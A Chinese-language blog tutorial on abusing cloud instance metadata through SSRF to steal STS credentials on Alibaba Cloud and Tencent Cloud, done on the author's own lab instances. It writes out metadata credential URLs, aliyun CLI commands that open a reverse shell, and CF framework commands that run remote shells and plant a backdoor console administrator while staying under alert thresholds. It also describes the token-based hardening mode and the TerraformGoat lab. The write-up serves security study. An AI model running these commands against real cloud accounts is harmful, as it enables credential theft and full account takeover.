前言

云服務(wù)器的實(shí)例元數(shù)據(jù)是指在實(shí)例內(nèi)部通過(guò)訪問(wèn)元數(shù)據(jù)服務(wù)（Metadata Service）獲取的實(shí)例屬性等信息，如實(shí)例 ID、VPC 信息、網(wǎng)卡信息。元數(shù)據(jù)包含實(shí)例角色所對(duì)應(yīng)的臨時(shí)憑據(jù)的情況下，如果服務(wù)器所搭載的對(duì)外業(yè)務(wù)服務(wù)存在 SSRF 漏洞，將造成云服務(wù)器可被攻擊者接管的風(fēng)險(xiǎn)。本文來(lái)具體實(shí)踐、學(xué)習(xí)下 SSRF 漏洞給云服務(wù)元數(shù)據(jù)帶來(lái)的安全威脅。

元數(shù)據(jù)服務(wù)威脅

在針對(duì)云上業(yè)務(wù)的的攻擊事件中，很多攻擊者將攻擊脆弱的元數(shù)據(jù)服務(wù)作為攻擊流程中重要的一個(gè)環(huán)節(jié)并最終造成了嚴(yán)重的危害。

以 2019 年的美國(guó)第一資本投資國(guó)際集團(tuán)（CapitalOne）信息泄露事件舉例，根據(jù)《ACase Study of the Capital One Data Breach》報(bào)告指出，攻擊者利用 CapitalOne 部署在 AWS 云上實(shí)例中的 SSRF 漏洞向元數(shù)據(jù)服務(wù)發(fā)送請(qǐng)求并獲取角色的臨時(shí)憑證，在獲取角色臨時(shí)憑據(jù)后將該角色權(quán)限下的 S3 存儲(chǔ)桶中的數(shù)據(jù)復(fù)制到攻擊者的本地機(jī)器上，最終導(dǎo)致這一嚴(yán)重?cái)?shù)據(jù)泄露事件的產(chǎn)生，這一事件影響了北美超過(guò)1億人。CapitalOne 的股價(jià)在宣布數(shù)據(jù)泄露后收盤(pán)下跌 5.9%，在接下來(lái)的兩周內(nèi)總共下跌了 15%。CapitalOne 信息泄露事件攻擊原理圖，可參見(jiàn)圖：

1.1 Metadata元數(shù)據(jù)

由于騰訊云不給我提供免費(fèi)試用的云服務(wù)器，下文選用阿里云 ECS 服務(wù)進(jìn)行學(xué)習(xí)和演示，實(shí)際上不同云服務(wù)商的元數(shù)據(jù)服務(wù)管理大同小異。

參見(jiàn)阿里云官方文檔：《通過(guò)元數(shù)據(jù)從ECS實(shí)例內(nèi)部獲取實(shí)例屬性等信息_云服務(wù)器 ECS(ECS)-阿里云幫助中心》，可以獲知元數(shù)據(jù)的含義：

ECS 實(shí)例元數(shù)據(jù)：是指在 ECS 實(shí)例內(nèi)部通過(guò)訪問(wèn)元數(shù)據(jù)服務(wù)（Metadata Service）獲取的實(shí)例屬性等信息，如實(shí)例 ID、VPC 信息、網(wǎng)卡信息。通過(guò)元數(shù)據(jù)服務(wù)，您無(wú)需登錄控制臺(tái)或調(diào)用 API，在實(shí)例內(nèi)部即可獲取實(shí)例信息，可以更便捷、安全地配置或管理正在運(yùn)行的實(shí)例或?qū)嵗系某绦颉＠?#xff0c;在基于 ECS 實(shí)例的應(yīng)用程序中，通過(guò)元數(shù)據(jù)獲取實(shí)例 RAM 角色的臨時(shí)訪問(wèn)憑證，以安全地訪問(wèn)相關(guān)授權(quán)資源（比如訪問(wèn) OSS 下載文件）。

【元數(shù)據(jù)的使用限制】

1. 僅網(wǎng)絡(luò)類(lèi)型為專(zhuān)有網(wǎng)絡(luò) VPC 的 ECS 支持實(shí)例元數(shù)據(jù)功能。
2. 僅支持在實(shí)例內(nèi)部訪問(wèn)元數(shù)據(jù)服務(wù)器來(lái)獲取實(shí)例元數(shù)據(jù)，且實(shí)例需處于運(yùn)行中狀態(tài)。
3. 單實(shí)例高頻訪問(wèn)元數(shù)據(jù)服務(wù)器獲取元數(shù)據(jù)，可能會(huì)導(dǎo)致限流。在高頻訪問(wèn)場(chǎng)景下，建議緩存已獲取的實(shí)例元數(shù)據(jù)。以 RAM 臨時(shí)安全憑證為例，獲取到憑證后建議將其緩存，并在憑證接近過(guò)期時(shí)間前重新獲取新的憑證，以避免因頻繁訪問(wèn)實(shí)例元數(shù)據(jù)服務(wù)器而導(dǎo)致的訪問(wèn)限流。

【獲取實(shí)例元數(shù)據(jù)】

# 普通模式下獲取，其中<metadata>：需替換為具體要查詢的實(shí)例元數(shù)據(jù)，可查閱實(shí)例元數(shù)據(jù)列表
curl http://100.100.100.200/latest/meta-data/<metadata># 加固模式下獲取
# 獲取訪問(wèn)元數(shù)據(jù)服務(wù)器訪問(wèn)憑證，需設(shè)置有效期，不可包含標(biāo)頭X-Forwarded-For
TOKEN=`curl -X PUT "http://100.100.100.200/latest/api/token" -H "X-aliyun-ecs-metadata-token-ttl-seconds:<元數(shù)據(jù)服務(wù)器訪問(wèn)憑證有效期>"`
# 獲取實(shí)例元數(shù)據(jù)
curl -H "X-aliyun-ecs-metadata-token: $TOKEN" http://100.100.100.200/latest/meta-data/<metadata>

各個(gè)云廠商都有自己的元數(shù)據(jù) metadata，下面給出部分云廠商的元數(shù)據(jù)訪問(wèn)地址：

阿里云元數(shù)據(jù)地址：http://100.100.100.200/latest/meta-data/ram/security-credentials/${role-name}
騰訊云元數(shù)據(jù)地址：http://metadata.tencentyun.com/latest/meta-data/cam/security-credentials/${role-name}
華為云元數(shù)據(jù)地址：http://169.254.169.254/
亞馬云元數(shù)據(jù)地址：http://169.254.169.254/
微軟云元數(shù)據(jù)地址：http://169.254.169.254/
谷歌云元數(shù)據(jù)地址：http://metadata.google.internal/

從上述阿里云官方文檔的描述可以看出幾點(diǎn)關(guān)鍵信息：

1. 元數(shù)據(jù)數(shù)據(jù)中包含敏感的實(shí)例 RAM 角色的臨時(shí)訪問(wèn)憑證；
2. 但是僅允許在實(shí)例內(nèi)部通過(guò)請(qǐng)求內(nèi)網(wǎng)地址來(lái)訪問(wèn)實(shí)例的元數(shù)據(jù)信息；
3. 阿里云為 ECS 云服務(wù)器實(shí)例提供了加固模式下獲取元數(shù)據(jù)的方式，進(jìn)一步規(guī)避元數(shù)據(jù)泄露風(fēng)險(xiǎn)。

Metadata 元數(shù)據(jù)的核心威脅？

由于元數(shù)據(jù)服務(wù)部署在鏈路本地地址上，云廠商默認(rèn)沒(méi)有進(jìn)一步設(shè)置安全措施來(lái)檢測(cè)或阻止由實(shí)例內(nèi)部發(fā)出的惡意的對(duì)元數(shù)據(jù)服務(wù)的未授權(quán)訪問(wèn)。攻擊者可以通過(guò)實(shí)例上應(yīng)用的 SSRF 漏洞對(duì)實(shí)例的元數(shù)據(jù)服務(wù)進(jìn)行訪問(wèn)。

因此，如果實(shí)例中應(yīng)用中存在 SSRF 漏洞，那么元數(shù)據(jù)服務(wù)將會(huì)完全暴露在攻擊者面前。在實(shí)例元數(shù)據(jù)服務(wù)提供的眾多數(shù)據(jù)中，有一項(xiàng)數(shù)據(jù)特別受到攻擊者的青睞，那就是角色的臨時(shí)訪問(wèn)憑據(jù)。這將是攻擊者由 SSRF 漏洞到獲取實(shí)例控制權(quán)限的橋梁。

1.2 RAM資源管理角色

上文提到獲取元數(shù)據(jù)敏感的數(shù)據(jù)是實(shí)例 RAM 角色的臨時(shí)訪問(wèn)憑證，RAM（Resource Access Management）資源訪問(wèn)控制是阿里云提供的一項(xiàng)管理用戶身份與資源訪問(wèn)權(quán)限的服務(wù)。參見(jiàn)官方文檔《什么是RAM角色_訪問(wèn)控制(RAM)-阿里云幫助中心》可知：

RAM 角色是一種虛擬用戶，可以被授予一組權(quán)限策略。與 RAM 用戶不同，RAM 角色沒(méi)有永久身份憑證（登錄密碼或訪問(wèn)密鑰），需要被一個(gè)可信實(shí)體扮演。扮演成功后，可信實(shí)體將獲得 RAM 角色的臨時(shí)身份憑證，即安全令牌（STS Token），使用該安全令牌就能以 RAM 角色身份訪問(wèn)被授權(quán)的資源。

在 Metadata 元數(shù)據(jù)中危害最大的莫過(guò)于能夠獲取到云服務(wù)器對(duì)應(yīng)的 sts（Security Token Service），通過(guò) sts 最大危害能夠接管控制臺(tái)，如從云服務(wù)器 SSRF 漏洞到接管阿里云控制臺(tái)。但在使用該攻擊方法之前，我們需要知道 ECS 本身是不存在 RAM 的，通過(guò)具體的 ECS 云服務(wù)器實(shí)例來(lái)看下。

先申請(qǐng)阿里云免費(fèi)試用（新用戶）的 ECS 云服務(wù)器（https://www.aliyun.com/daily-act/ecs/activity_selection）：


登錄 ECS 服務(wù)器實(shí)例，請(qǐng)求訪問(wèn)元數(shù)據(jù)：

從返回的路徑可以看出當(dāng)前 Metadata 元數(shù)據(jù)資源中不包含 ram 子路徑，此時(shí)請(qǐng)求 http://100.100.100.200/latest/meta-data/ram/security-credentials/ 自然也是不包含 RAM 憑據(jù)信息的：

如果我們需要讓 ECS 擁有 RAM，并且讓我們?nèi)ダ?metadata 進(jìn)行滲透，那么就首先需要去給對(duì)應(yīng)的服務(wù)器授予一個(gè) RAM 角色，我們?cè)L問(wèn)阿里云控制臺(tái)，搜索訪問(wèn)控制或直接訪問(wèn)https://ram.console.aliyun.com/roles，并點(diǎn)擊創(chuàng)建角色，選擇“阿里云服務(wù)角色”：

在配置角色上，選擇普通服務(wù)角色，并選擇受信服務(wù)為云服務(wù)器：

點(diǎn)擊完成，然后訪問(wèn)阿里云控制臺(tái)，搜索 ECS 或訪問(wèn)直接 https://ecs.console.aliyun.com/，點(diǎn)擊實(shí)例，并且為服務(wù)器授予剛剛創(chuàng)建的 RAM 角色：

然后再次請(qǐng)求訪問(wèn)元數(shù)據(jù)，就會(huì)發(fā)現(xiàn)已經(jīng)存在 ram 路徑和 RoleTest 這個(gè) ram 角色了（ http://100.100.100.200/latest/meta-data/ram/security-credentials/），并進(jìn)一步獲得臨時(shí)憑證（http://100.100.100.200/latest/meta-data/ram/security-credentials/RoleTest）：

但是，拿到臨時(shí)憑證不意味著就可以直接控制服務(wù)器實(shí)例，還取決于該臨時(shí)憑證所對(duì)應(yīng)的角色所擁有的權(quán)限。

回到訪問(wèn)控制頁(yè)面（https://ram.console.aliyun.com/roles），在角色欄中找到 RAM 角色 RoleTest，可以發(fā)現(xiàn)，此角色創(chuàng)建后是默認(rèn)沒(méi)有什么權(quán)限的：

這意味著如果 RAM 角色沒(méi)有被授權(quán)，哪怕拿到了臨時(shí)憑證也沒(méi)有任何作用，Metadata 滲透的成果取決于 RAM 角色的權(quán)限大小。反過(guò)來(lái)，只要 RAM 角色的權(quán)限足夠大，即使它只是個(gè) STS 憑證，也能夠造成足夠威力的破壞?？梢钥吹浇o角色新增授權(quán)的時(shí)候可以選擇 AdministratorAccess，使得擁有該角色的賬戶具備管理所有阿里云資源的權(quán)限。

小結(jié)一下，訪問(wèn)管理的角色是擁有一組權(quán)限的虛擬身份，用于對(duì)角色載體授予云中服務(wù)、操作和資源的訪問(wèn)權(quán)限。用戶可以將角色關(guān)聯(lián)到云服務(wù)器實(shí)例。為實(shí)例綁定角色后，將具備以下功能及優(yōu)勢(shì)：

1. 可使用 STS 臨時(shí)密鑰訪問(wèn)云上其他服務(wù)；
2. 可為不同的實(shí)例賦予包含不同授權(quán)策略的角色，使實(shí)例對(duì)不同的云資源具有不同的訪問(wèn)權(quán)限，實(shí)現(xiàn)更精細(xì)粒度的權(quán)限控制；
3. 無(wú)需自行在實(shí)例中保存 SecretKey，通過(guò)修改角色的授權(quán)即可變更權(quán)限，快捷地維護(hù)實(shí)例所擁有的訪問(wèn)權(quán)限；

具體的操作流程如下：

在將角色成功綁定實(shí)例后，用戶可以在實(shí)例上訪問(wèn)元數(shù)據(jù)服務(wù)來(lái)查詢此角色的臨時(shí)憑據(jù)，并使用獲得的臨時(shí)憑據(jù)操作該角色權(quán)限下的云服務(wù) API 接口。

1.3 STS 臨時(shí)憑據(jù)利用

每個(gè)云服務(wù)廠商都會(huì)提供對(duì)應(yīng)的云服務(wù)器客戶端管理工具，拿到臨時(shí)憑證后可以下載對(duì)應(yīng)的客戶端管理工具來(lái)管理云服務(wù)器實(shí)例。此處阿里云 ECS 服務(wù)器實(shí)例的話使用原生的阿里云 CLI 工具，可以到官網(wǎng)下載（含使用指導(dǎo)）：《安裝指南_阿里云CLI(CLI)-阿里云幫助中心》。

本人選擇安裝到 VPS，安裝后首先需要配置 STS Token 憑證：

aliyun configure --profile stsTokenProfile --mode StsToken

接下來(lái)對(duì) ECS 的管理，可使用 aliyun ecs help 命令即可獲取幫助信息，也可以參考《 通過(guò)CLI使用和管理ECS實(shí)例及其示例_云服務(wù)器 ECS(ECS)》：

aliyun ecs <ApiName> --parameter1 value1 --parameter2 value2 ...

比如執(zhí)行 aliyun ecs DescribeInstances 可查詢實(shí)例信息：

此處本人參考《創(chuàng)建云助手命令_云服務(wù)器 ECS(ECS)-阿里云幫助中心》構(gòu)造命令和參數(shù)，借助 aliyun-cli 執(zhí)行任意命令來(lái)反彈 Shell：

# 1、創(chuàng)建命令（CommandContent 參數(shù)是將要執(zhí)行的命令的bash64值，其他參數(shù)含義請(qǐng)參見(jiàn)官方文檔）：
aliyun ecs CreateCommand --Type 'RunShellScript' --RegionId 'cn-beijing' --Name 'shell' --CommandContent 'L2Jpb********************JjE='
# 2、執(zhí)行命令：
aliyun ecs InvokeCommand --RegionId 'cn-beijing' --Timed 'false' --InstanceId.1 'i-2ze8lk********' --CommandId 'c-bj04ak********'

發(fā)現(xiàn)成功在 VPS 上反彈 Shell，順利接管 ECS 服務(wù)器：

值得一提的是，此過(guò)程中阿里云安全中心（云盾：https://yundun.console.aliyun.com/）給出了兩條告警（發(fā)送了告警手機(jī)短信），及時(shí)識(shí)別出了認(rèn)證憑據(jù)泄露和服務(wù)器實(shí)例執(zhí)行危險(xiǎn)指令的安全風(fēng)險(xiǎn)：
其他廠商的 MetaData 數(shù)據(jù)泄露憑證后的利用方式大致同上，參見(jiàn)具體的官方指導(dǎo)文檔即可。

1.4 CF云環(huán)境利用框架

針對(duì)不同廠商泄露 AK、SK 憑證后不同的 API 調(diào)用方式，給攻擊利用增加了不少成本，需要大量閱讀官方指導(dǎo)文檔才行。teamssix 大佬開(kāi)發(fā)了集成多個(gè)云服務(wù)廠商通用的滲透測(cè)試工具：https://github.com/teamssix/cf，同時(shí)提供了官方指導(dǎo) Wiki 文檔：https://wiki.teamssix.com/cf/。

CF 即 Cloud Exploitation Framework 云環(huán)境利用框架的簡(jiǎn)稱，方便安全人員在獲得 AK 的后續(xù)工作。適用于在紅隊(duì)場(chǎng)景中對(duì)云上內(nèi)網(wǎng)進(jìn)行橫向、SRC 場(chǎng)景中對(duì) Access Key 即訪問(wèn)憑證的影響程度進(jìn)行判定、企業(yè)場(chǎng)景中對(duì)自己的云上資產(chǎn)進(jìn)行自檢等等?？上г摴ぞ咭呀?jīng)被作者轉(zhuǎn)為閉源私有倉(cāng)庫(kù)了，需私聊作者獲取。

接下來(lái)看看如何通過(guò) cf 工具快速利用獲取到的元數(shù)據(jù)憑證數(shù)據(jù)接管阿里云 ECS 服務(wù)器。

[root@hwc-hwp-587401-751218 CF]# ./cf▄████   ?████▄██?        ?██      ██████╗    ███████╗??          ??     ██╔════╝    ██╔════╝??????????       ██║         █████╗▄▄          ▄▄     ██║         ██╔══╝██▄        ▄██     ╚██████╗    ██║?████   ?████?      ╚═════╝    ╚═╝github.com/teamssix/cf
當(dāng)前 CF 版本是內(nèi)部版本，請(qǐng)勿對(duì)外轉(zhuǎn)發(fā)。
CF 是一個(gè)云環(huán)境利用框架工具，請(qǐng)?jiān)讷@得目標(biāo)授權(quán)的情況下利用此工具。Usage:cf [command]
Available Commands:about        關(guān)于作者alibaba      執(zhí)行與阿里云相關(guān)的操作aws          執(zhí)行與 AWS 相關(guān)的操作completion   Generate the autocompletion script for the specified shellconfig       配置云服務(wù)商的訪問(wèn)密鑰help         Help about any commandhuawei       執(zhí)行與華為云相關(guān)的操作tencent      執(zhí)行與騰訊云相關(guān)的操作version      輸出 CF 的版本和更新時(shí)間Flags:-h, --help              help for cf--logLevel string   設(shè)置日志等級(jí) [trace|debug|info|warn|error|fatal|panic] (default "info")Use "cf [command] --help" for more information about a command.
[root@hwc-hwp-587401-751218 CF]#

1、 先執(zhí)行 ./cf config 進(jìn)行云服務(wù)商的訪問(wèn)密鑰的配置：

2、 一鍵列出當(dāng)前訪問(wèn)憑證的云服務(wù)資源 ./cf alibaba ls：

3、 然后可執(zhí)行 ./cf alibaba perm 來(lái)列出當(dāng)前 RAM 角色的權(quán)限，即一鍵列出當(dāng)前訪問(wèn)憑證的權(quán)限：

[root@hwc-hwp-587401-751218 CF]# ./cf alibaba perm
? 枚舉可能會(huì)導(dǎo)致 AK 被禁用，是否繼續(xù)？ Yes
[2024-02-04 11:24:37]  INFO 當(dāng)前用戶名為 roletest (Current username is roletest)
[root@hwc-hwp-587401-751218 CF]#

上面執(zhí)行結(jié)果跟作者 Teamssix 給出的執(zhí)行結(jié)果樣例差距較大（暫不知道原因），正常應(yīng)該列出當(dāng)前憑據(jù)的角色對(duì)應(yīng)的權(quán)限新，如下所示：

4、 查看 CF 為實(shí)例執(zhí)行命令的操作的幫助信息：

[root@hwc-hwp-587401-751218 CF]# ./cf alibaba ecs exec -h
在實(shí)例上執(zhí)行命令 (Execute the command on the instance)
Usage:cf alibaba ecs exec [flags]Flags:-i, --InstanceId string         指定實(shí)例 ID (Specify Instance ID) (default "all")-a, --allRegions                使用所有區(qū)域，包括私有區(qū)域 (Use all regions, including private regions)-b, --batchCommand              一鍵執(zhí)行三要素，方便 HW (Batch execution of multiple commands used to prove permission acquisition)-c, --command string            設(shè)置待執(zhí)行的命令 (Set the command you want to execute)-f, --file string               設(shè)置待執(zhí)行的命令文件 (Set the command file you want to execute)-h, --help                      help for exec--lhost string              設(shè)置反彈 shell 的主機(jī) IP (Set the ip of the listening host)--lport string              設(shè)置反彈 shell 的主機(jī)端口 (Set the port of the listening host)-m, --metaDataSTSToken          一鍵獲取實(shí)例元數(shù)據(jù)中的臨時(shí)訪問(wèn)密鑰 (Get the STS Token in the instance metadata)-r, --region string             指定區(qū)域 ID (Specify region ID) (default "all")-s, --scriptType string         設(shè)置執(zhí)行腳本的類(lèi)型 (Specify the type of script to execute) [sh|bat|ps] (default "auto")-t, --timeOut int               設(shè)置命令執(zhí)行結(jié)果的等待時(shí)間 (Set the command execution result waiting time) (default 60)-u, --userData                  一鍵獲取實(shí)例中的用戶數(shù)據(jù) (Get the user data on the instance)--userDataBackdoor string   用戶數(shù)據(jù)后門(mén)，需要輸入后門(mén)命令 (User data backdoor requires inputting the backdoor command)Global Flags:--flushCache        刷新緩存，不使用緩存數(shù)據(jù) (Refresh the cache without using cached data)--logLevel string   設(shè)置日志等級(jí) [trace|debug|info|warn|error|fatal|panic] (default "info")
[root@hwc-hwp-587401-751218 CF]#

執(zhí)行任意命令：

./cf alibaba ecs exec -i i-2zeXXXXX（實(shí)例ID） -c 'whoami && id'

在 CF 中執(zhí)行反彈 Shell 命令（同樣會(huì)觸發(fā)了阿里云云盾的安全告警）：

cf alibaba ecs exec --lhost 123.123.123.123 --lport 4444 -i i-abXXXXXX（實(shí)例ID）參數(shù)釋義：--lhost 參數(shù)配置為自己監(jiān)聽(tīng)主機(jī)的 IP--lport 參數(shù)配置為自己的監(jiān)聽(tīng)端口-i      設(shè)置要反彈 Shell 的實(shí)例 ID（如果未指定具體的實(shí)例，則 CF 會(huì)提醒是否是選擇全部實(shí)例還是某個(gè)實(shí)例

5、接下來(lái)上大招，在當(dāng)前訪問(wèn)憑證至少擁有 AliyunRAMFullAccess 權(quán)限的情況下，可以借助 CF 工具一鍵接管控制臺(tái)，接管控制臺(tái)的時(shí)候默認(rèn)會(huì)創(chuàng)建一個(gè)管理員后門(mén)用戶：

# 一鍵接管控制臺(tái)，會(huì)創(chuàng)建后門(mén)用戶，可登錄阿里云Web控制臺(tái)
cf alibaba console
# 如果不想使用默認(rèn)用戶名，可以通過(guò) -u 參數(shù)指定新建用戶名
cf alibaba console -u Tr0e# 取消接管控制臺(tái)，后門(mén)用戶也會(huì)隨之刪除
cf alibaba console cancel

為了避免一鍵創(chuàng)建后門(mén)賬戶觸發(fā)云盾告警，CF 默認(rèn)創(chuàng)建的賬戶并未具備高權(quán)限：

但是我們可以通過(guò) https://ram.console.aliyun.com/users 給自己賬戶添加完全管理權(quán)限來(lái)接管整個(gè)云資源：



以上過(guò)程則不會(huì)觸發(fā)云盾的告警，最后別忘了刪除后門(mén)賬戶。

關(guān)于 CF 其他功能用法以及對(duì)其它云服務(wù)廠商的利用，請(qǐng)參見(jiàn)作者提供的官方 Wiki 文檔，不再贅述。

1.5 元數(shù)據(jù)安全性增強(qiáng)

從阿里云官方文檔：《通過(guò)元數(shù)據(jù)從ECS實(shí)例內(nèi)部獲取實(shí)例屬性等信息_云服務(wù)器 ECS(ECS)-阿里云幫助中心》可以看出，阿里云為元數(shù)據(jù)提供了加固模式：

加固模式下獲取元數(shù)據(jù)：

# 獲取訪問(wèn)元數(shù)據(jù)服務(wù)器訪問(wèn)憑證，需設(shè)置有效期，范圍為1秒~21600秒（6小時(shí)），不可包含標(biāo)頭X-Forwarded-For
TOKEN = `curl -X PUT "http://100.100.100.200/latest/api/token" -H "X-aliyun-ecs-metadata-token-ttl-seconds:<元數(shù)據(jù)服務(wù)器訪問(wèn)憑證有效期>"`
# 獲取實(shí)例元數(shù)據(jù)
curl -H "X-aliyun-ecs-metadata-token: $TOKEN" http://100.100.100.200/latest/meta-data/<metadata>

可以看出，加固模式下實(shí)例和實(shí)例元數(shù)據(jù)服務(wù)器之間通過(guò) PUT 請(qǐng)求來(lái)建立一個(gè)會(huì)話，并在查看實(shí)例元數(shù)據(jù)時(shí)通過(guò) Token 驗(yàn)證身份，超過(guò)有效期后關(guān)閉會(huì)話并清除 Token。由于 SSRF 漏洞的 HTTP 請(qǐng)求正常情況下無(wú)法滿足發(fā)起 PUT 請(qǐng)求的條件，故可以保障云服務(wù)器的業(yè)務(wù)存在 SSRF 漏洞的情況下不被攻擊者輕易利用來(lái)獲取敏感的元數(shù)據(jù)。

在已經(jīng)創(chuàng)建好的 ECS 實(shí)例中，可以在阿里云 OpenAPI 中開(kāi)啟元數(shù)據(jù)強(qiáng)制使用 Token 訪問(wèn)，OpenAPI 地址：https://next.api.aliyun.com/api/Ecs/2014-05-26/ModifyInstanceMetadataOptions，將 HttpTokens 設(shè)置為 required 即表示強(qiáng)制使用加固模式，此時(shí)再訪問(wèn)元數(shù)據(jù)就會(huì)提示 403 了。


但是阿里云默認(rèn)是同時(shí)提供普通模式和加固模式來(lái)獲取元數(shù)據(jù)的，也就意味著這是一個(gè)“默認(rèn)不安全”的安全增強(qiáng)機(jī)制。同時(shí)當(dāng)攻擊者通過(guò)其他漏洞（例如 RCE 漏洞）獲取實(shí)例的控制權(quán)之后，元數(shù)據(jù)的加固模式帶來(lái)的安全機(jī)制將變得形同虛設(shè)。因?yàn)楣粽呖梢栽趯?shí)例上發(fā)送 PUT 請(qǐng)求獲取 token，隨后利用獲得的 token 獲取角色臨時(shí)憑據(jù)，最后利用角色臨時(shí)憑據(jù)訪問(wèn)角色綁定的一切云業(yè)務(wù)，具體流程見(jiàn)下圖：

總之，當(dāng)攻擊者通過(guò) RCE 漏洞獲取實(shí)例控制權(quán)后，可以通過(guò)元數(shù)據(jù)服務(wù)獲取到的臨時(shí)憑據(jù)進(jìn)行云服務(wù)的橫向移動(dòng)。攻擊者也可以查看服務(wù)器上其他業(yè)務(wù)的 AK、SK 等敏感憑據(jù)，比如對(duì)象存儲(chǔ)服務(wù)、數(shù)據(jù)庫(kù)服務(wù)器的配置文件，進(jìn)而接管更多服務(wù)器實(shí)例。鑒于云廠商產(chǎn)品 API 功能的強(qiáng)大性，在獲取角色臨時(shí)憑據(jù)后，可能造成及其嚴(yán)重的影響值得注意的是，如果在云平臺(tái)控制臺(tái)中執(zhí)行一些高危行為，平臺(tái)默認(rèn)都會(huì)需要進(jìn)行手機(jī)驗(yàn)證。但通過(guò)使用臨時(shí)憑據(jù)調(diào)用發(fā)送請(qǐng)求調(diào)用API接口，并不需要手機(jī)驗(yàn)證碼，可以繞過(guò)這項(xiàng)安全檢測(cè)。

TerraformGoat

TerraformGoat 是火線安全團(tuán)隊(duì)提供的一個(gè)支持多云的云場(chǎng)景漏洞靶場(chǎng)搭建工具（https://github.com/HXSecurity/TerraformGoat/），目前支持阿里云、騰訊云、華為云、Amazon Web Services、Google Cloud Platform、Microsoft Azure 六個(gè)云廠商的云場(chǎng)景漏洞搭建。下文將借助該工具搭建一個(gè)騰訊云的 SSRF 云靶場(chǎng)環(huán)境，演示如何借助 SSRF 漏洞接管騰訊云控制臺(tái)。本來(lái)是要搭建阿里云 SSRF 環(huán)境的，但是報(bào)錯(cuò)了，成功案例參見(jiàn)：《從云服務(wù)器 SSRF 漏洞到接管你的阿里云控制臺(tái)》。

2.1 永久性AccessKey

TerraformGoat 搭建阿里云靶場(chǎng)時(shí)需要配置 AccessKey，此 AccessKy 并不是上文提到的元數(shù)據(jù)認(rèn)證信息里面的臨時(shí)憑據(jù)，AccessKey（簡(jiǎn)稱AK）是阿里云提供給阿里云用戶的永久訪問(wèn)密鑰，用于通過(guò)開(kāi)發(fā)工具（API、CLI、SDK、Cloud Shell、Terraform 等）訪問(wèn)阿里云時(shí)的身份驗(yàn)證，不用于控制臺(tái)登錄。AccessKey 包括 AccessKey ID 和 AccessKey Secret，需要一起使用，請(qǐng)妥善保管。具體如下：

1. AccessKey ID：用于標(biāo)識(shí)用戶；
2. AccessKey Secret：用于驗(yàn)證用戶的密鑰。AccessKey Secret 必須保密；

官方文檔《阿里云AccessKey如何創(chuàng)建_訪問(wèn)控制(RAM)-阿里云幫助中心》給出了創(chuàng)建 AccessKey 的方法，先創(chuàng)建好備用：


騰訊云的 AccessKey 獲取方式（https://console.cloud.tencent.com/cam/capi）也一樣：

2.2 SSRF靶場(chǎng)環(huán)境搭建

參見(jiàn)官方中文指導(dǎo)文檔：https://github.com/HXSecurity/TerraformGoat/blob/main/README_CN.md。

TerraformGoat 使用 Docker 鏡像部署，根據(jù)你使用到的云服務(wù)提供商，選擇對(duì)應(yīng)的安裝命令。阿里云下的環(huán)境搭建：

docker pull registry.cn-hongkong.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.7
docker run -itd --name terraformgoat_aliyun_0.0.7 registry.cn-hongkong.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.7
docker exec -it terraformgoat_aliyun_0.0.7 /bin/bash

進(jìn)入到阿里云 ECS SSRF 靶場(chǎng)路徑下，并配置你的 AccessKey：

cd /TerraformGoat/aliyun/ecs/ecs_ssrf/
aliyun configure

接著可以開(kāi)始正式部署、初始化 SSRF 靶場(chǎng)環(huán)境：

terraform init
terraform apply

結(jié)果搭建失敗（原以為是因?yàn)槊赓M(fèi)版的導(dǎo)致失敗，結(jié)果購(gòu)買(mǎi)了按量付費(fèi)的新的實(shí)例依舊初始化靶場(chǎng)失敗，原因不詳……）：

更換為騰訊云的 SSRF 靶場(chǎng)（指導(dǎo)文檔：https://github.com/HXSecurity/TerraformGoat/blob/main/tencentcloud/cvm/cvm_ssrf/README_CN.md）：

# 1、拉取騰訊云靶場(chǎng)
docker pull registry.cn-hongkong.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.7
docker run -itd --name terraformgoat_tencentcloud_0.0.7 registry.cn-hongkong.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.7
docker exec -it terraformgoat_tencentcloud_0.0.7 /bin/bash# 2、完成密鑰配置與 SSRF 靶場(chǎng)初始化設(shè)置，在 terraform.tfvars 文件填入騰訊云 AccessKey
cd /TerraformGoat/tencentcloud/cvm/cvm_ssrf
vim terraform.tfvars
terraform init
terraform apply# 3、實(shí)驗(yàn)最后的環(huán)境銷(xiāo)毀
terraform destroy

額……充值 10 塊試試，終于搭建成功了！

這個(gè)過(guò)程中靶場(chǎng)借助我提供的 AccessKey 為我自動(dòng)購(gòu)買(mǎi)了一個(gè)新的按量計(jì)費(fèi)騰訊云服務(wù)器實(shí)例并搭建了 SSRF 環(huán)境（細(xì)思極恐）……最后給出了一個(gè)公網(wǎng)地址的 SSRF 鏈接：


在存在 SSRF 漏洞的 CVM 服務(wù)器實(shí)例上，我們可以利用 SSRF 讀取 CVM 的元數(shù)據(jù)信息：

# 讀取騰訊云的元數(shù)據(jù)
http://metadata.tencentyun.com/latest/meta-data/

但是沒(méi)有看到具備角色的 ram/ 路徑，無(wú)法獲取臨時(shí)憑證，需要我們進(jìn)一步手工給服務(wù)器實(shí)力配置角色和權(quán)限。

騰訊云元數(shù)據(jù)官方指導(dǎo)文檔：《云服務(wù)器 查看實(shí)例元數(shù)據(jù)-操作指南-文檔中心-騰訊云》。

2.3 騰訊云CVM配角色

騰訊云 CVM 服務(wù)器實(shí)例的角色配置跟阿里云 ECS 服務(wù)器大同小異，角色管理地址：https://console.cloud.tencent.com/cam/role。

新建角色 tr0e，角色配置選擇“騰訊云產(chǎn)品服務(wù)–云服務(wù)器–AdministratorAccess”：




然后給 CVM 服務(wù)器實(shí)例授予該角色：


此時(shí)再到 SSRF-Lab 訪問(wèn)實(shí)例的元數(shù)據(jù)，就可以看到 CVM 服務(wù)器實(shí)例的 CAM 角色所生成的臨時(shí)憑證了（TmpSecretKey、Token 等字段）：

# 讀取騰訊云的元數(shù)據(jù)
http://metadata.tencentyun.com/latest/meta-data/# 讀取騰訊云的元數(shù)據(jù)中的會(huì)話憑據(jù)
http://metadata.tencentyun.com/latest/meta-data/cam/security-credentials/tr0e

在上述獲得的憑據(jù)信息中看到了 Expiration 字段，回顧下跟上文 Accesskey 的最大區(qū)別就是角色的會(huì)話憑證是有時(shí)效性的：

【安全風(fēng)險(xiǎn)提醒】

